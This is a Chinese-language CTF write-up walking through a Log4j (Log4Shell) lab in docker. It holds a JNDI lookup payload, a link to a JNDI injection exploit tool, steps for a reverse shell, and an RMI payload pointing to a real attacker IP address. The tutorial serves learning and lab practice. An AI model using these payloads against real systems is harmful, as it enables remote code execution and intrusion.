type
Post
status
Published
date
slug
summary
tags
CTF
category
CTF-Knowledge
category (1)
icon
password
comment
环境准备
搭建docker服务

image-20231029204448313
点问号,会发现传参方式是GET

image-20231029204537659
先测试有没有log4j漏洞
测试漏洞
利用DNSlog验证漏洞存在
去dns平台获得一个dns

image-20231029205139684
构造payload:${jndi:ldap://你的dns网址},进行传参

image-20231029205716002
有dns解析记录,说明存在漏洞
漏洞利用
这里选用JNDI注入工具:JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
下载JNDI注入工具JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar,下载地址为https://github.com/bkfish/Apache-Log4j-Learning/tree/main
应用工具JNDI-Injection-Exploit搭建服务:
格式:
这里的命令是想要靶机运行的命令,-A后放的是发出攻击的电脑的ip,也是存放-C后“命令”的ip地址。
接下来要实现反弹shell,可以用命令
注意“命令”必须经过编码,不然将无法实现

image-20231029205947722
payload
设置监听端口
在vps中打开一个页面,监听我们的对应的端口。

image-20231029210526653

image-20231029210548140
替换payload rmi://111.229.162.217:1099/fb08m1

在这里插入图片描述
执行java命令和接受反弹shell的主机要是同一台
- 作者:qetx
- 链接:http://qetx.top/article/3464714d-7b79-4ba4-a73b-a77cf3e64c93
- 声明:本文采用 CC BY-NC-SA 4.0 许可协议,转载请注明出处。








